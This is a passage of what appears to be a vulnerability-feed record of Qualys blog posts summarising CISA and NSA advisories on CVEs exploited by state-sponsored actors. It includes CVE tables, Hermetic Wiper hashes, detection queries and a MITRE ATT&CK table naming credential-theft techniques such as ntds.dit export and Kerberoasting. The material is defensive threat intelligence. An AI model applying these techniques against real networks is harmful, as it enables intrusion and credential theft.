encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### **Appendix:**\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n**SHA256 Hashes** \n--- \n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da \n06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 \n095c7fa99dbc1ed7a3422a52cc61044ae4a25f7f5e998cc53de623f49da5da43 \n0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0 \n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 \n2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf \n34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 \n3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 \n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 \n7e154d5be14560b8b2c16969effdb8417559758711b05615513d1c84e56be076 \n923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 \n9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d \na196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 \nb01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1 \nb60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22 \nb6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd \nc2d06ad0211c24f36978fe34d25b0018ffc0f22b0c74fd1f915c608bf2cfad15 \nd4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a \ndcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 \ne5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 \nf50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321 \nfd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d \n \n#### List of MITRE ATT&CK TIDs provided by CISA\n\n**Tactic**| **Technique******| **Procedure****** \n---|---|--- \nReconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| \nRussian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042]](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-12T20:01:11", "description": "On October 6, 2022, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>) on the Chinese government\u2014officially known as the People\u2019s Republic of China (PRC) states-sponsored cyber actors' activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People's Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). The PRC malicious actor continues to exploit known vulnerabilities to target U.S. and vigorously allied networks and software and hardware companies to rob intellectual property and develop access to sensitive networks. \n\nThey stated that PRC state-sponsored cyber activities as one of the most significant and dynamic threats to U.S. government and civilian networks. The PRC state-sponsored cyber actors persist in targeting government and critical infrastructure networks with an increasing array of new and adaptive techniques. Some could pose a considerable risk to Information Technology Sector, telecommunications organizations, Defense Industrial Base (DIB) Sector, and other critical infrastructure organizations. \n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target victims. Here is a list of 20 publicly known vulnerabilities (CVEs) published by the NSA, along with affected products and associated Qualys VMDR QID(s) for each vulnerability: \n\n**Vendor**| **CVE**| **Vulnerability Type**| Qualys **QID**(s) \n---|---|---|--- \n| | | \nApache Log4j | CVE-2021-44228 | Remote Code Execution | 730302, 150441, 150440, and more \nPulse Connect Secure | CVE-2019-11510 | Arbitrary File Read | 38771 \nGitLab CE/EE | CVE-2021-22205 | Remote Code Execution | 375475 \nAtlassian | CVE-2022-26134 | Remote Code Execution | 730514, 376657, 150523 \nMicrosoft Exchange | CVE-2021-26855 | Remote Code Execution | 50107, 50108 \nF5 Big-IP | CVE-2020-5902 | Remote Code Execution | 38791, 373106 \nVMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload | 216265, 216266 \nCitrix ADC | CVE-2019-19781 | Path Traversal | 372685, 150273, 372305 \nCisco Hyperflex | CVE-2021-1497 | Command Line Execution | 730070 \nBuffalo WSR | CVE-2021-20090 | Relative Path Traversal | NA \nAtlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution | 150368, 375839, 730172 \nHikvision Webserver | CVE-2021-36260 | Command Injection | NA \nSitecore XP | CVE-2021-42237 | Remote Code Execution | 14012 \nF5 Big-IP | CVE-2022-1388 | Remote Code Execution | 150511, 730489, 376577 \nApache | CVE-2022-24112 | Authentication Bypass by Spoofing | 730361 \nZOHO | CVE-2021-40539 | Remote Code Execution | 375840 \nMicrosoft | CVE-2021-26857 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-26858 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-27065 | Remote Code Execution | 50107 \nApache HTTP Server | CVE-2021-41773 | Path Traversal | 150373, 150372, 710595 and more \nTable 1: Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\nNSA stated that the threat actors use virtual private networks (VPNs) to obscure their activities and establish initial access. Multiple CVEs indicated in Table 1 let the actors stealthily acquire unauthorized access into sensitive networks, after which they pursue to develop persistence and reposition laterally to other internally connected networks. \n\nThe NSA highlights how the People\u2019s Republic of China (PRC) has targeted and compromised significant telecom establishments and network service providers mostly by exploiting publicly known vulnerabilities. Networks affected have varied from small office/home office (SOHO) routers to medium and large enterprise networks. \n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. The devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as means to conduct network intrusions on other entities. Furthermore, cyber defenders often overlook these devices, who work to maintain and keep pace with frequent software patching of Internet-facing services and endpoint devices. \n\n## Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0 \n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), Vulnerabilities tab by using the following QQL query: \n\n_vulnerabilities.vulnerability.cveIds: [CVE-2021-44228, CVE-2019-11510, CVE-2021-22205, CVE-2022-26134, CVE-2021-26855, CVE-2020-5902, CVE-2021-22005, CVE-2019-19781, CVE-2021-1497, CVE-2021-20090, CVE-2021-26084, CVE-2021-36260, CVE-2021-42237, CVE-2022-1388, CVE-2022-24112, CVE-2021-40539, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-41773]_ \n\n\n\nUsing, [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), you can also effectively prioritize these vulnerabilities using the [Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>).\n\n\n\n## Identify Vulnerable Assets using Qualys Threat Protection \n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability. \n\n\n\nUsing the Qualys Unified Dashboard, you can track, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment. \n\nRead the Article (Qualys Customer Portal): [NSA Top Exploited CVEs | China State Actors](<https://success.qualys.com/support/s/article/000007011>) \n\n\n\n## Recommendations & Mitigations \n\nThe NSA, CISA, and FBI recommend U.S. and allied governments, critical infrastructure, and private sector organizations use the mitigation guidance provided to boost their defensive posture and decrease the threat of compromise from PRC state-sponsored threat cyber actors. \n\nHere is a summary of mitigations guidance provided by the NSA: \n\n * Update, prioritize and patch vulnerable systems as soon as possible, as listed in this article and the list provided by [CISA KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n * Utilize phishing-resistant multi-factor authentication and require all accounts with a unique and strong password. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices. \n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\nOne of the soundest methods that organizations of all sizes could stay on top of these vulnerabilities and end-of-life (EOL) network/device infrastructure as noted by NSA general mitigations guidelines is to catalog the infected assets and apply patches as soon as possible. This could be an effortless process if the corps utilize the power of Qualys VMDR 2.0. You can start your [Qualys VMDR 2.0 trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting, and patching the high-priority commonly exploited vulnerabilities. \n\n## Contributors\n\n * Felix Jimenez Saez, Director, Product Management, Qualys\n * Swapnil Ahirrao, Principal Product Manager, VMDR, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-07T20:03:01", "type": "qualysblog", "title": "NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-07T20:03:01", "id": "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-23T16:02:16", "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * \n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for "Active Attack" RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.\n\n\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "cvss3": {}, "published": "2020-10-22T23:10:29", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [_`_CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,` CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for \u201cActive Attack\u201d 